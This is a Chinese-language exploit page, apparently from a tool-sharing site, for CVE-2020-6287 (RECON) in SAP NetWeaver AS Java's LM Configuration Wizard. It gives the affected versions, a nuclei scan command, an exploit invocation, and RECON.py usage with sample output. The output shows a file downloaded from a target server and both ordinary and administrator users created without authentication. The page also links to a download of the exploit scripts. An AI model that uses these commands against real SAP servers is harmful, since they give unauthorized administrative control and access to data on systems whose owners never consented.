## 漏洞概述
在`SAP NetWeaver AS Java` 的`LM`配置向导中缺乏身份验证,未经身份验证的远程攻击者可以执行有危害的操作,包括但不限于创建管理员用户。攻击者可能获得对`adm`的访问权限,`adm`是操作系统用户,它可以无限制地访问与`SAP`系统相关的所有本地资源。
## 影响范围
“`http
SAP NetWeaver AS JAVA(LM Configuration Wizard)7.30
SAP NetWeaver AS JAVA(LM Configuration Wizard)7.31
SAP NetWeaver AS JAVA(LM Configuration Wizard)7.40
SAP NetWeaver AS JAVA(LM Configuration Wizard)7.50
“`
## POC
“`bash
nuceli -tags sap -t cves/ -l urls.txt
“`
## EXP
“`bash
python CVE-2020-6287.py http://vul-IP:50000/ test123 test@123123
“`
## EXP (RECON.py)
[chipik/SAP_RECON](https://github.com/chipik/SAP_RECON)
Just point SAP NW AS Java hostnmae/ip.
There is additional options:
1. `-c` – check if SAP server is vulnerable to RECON
2. `-f` – download `zip` file from SAP server
3. `-u` – create user SAP JAVA user with `Authenticated User` role
4. `-a` – create user SAP JAVA user with `Administrator` role
Ex.: Download zip file
“`bash
python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 – Vulnerable! – http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved
“`
Ex.: Create SAP JAVA user
“`bash
~python RECON.py -H 172.16.30.8 -u
Check1 – Vulnerable! – http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created
“`
Ex.: Create SAP JAVA Administrator user
“`bash
~python RECON.py -H 172.16.30.8 -a
Check1 – Vulnerable! [CVE-2020-6287] (RECON) – http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role ‘Administrator’
Ok! Admin user were created
“`
[点我下载 CVE-2020-6287.py RECON.py](/Gr33kLibrary/download_tool/84/)
请登录后查看评论内容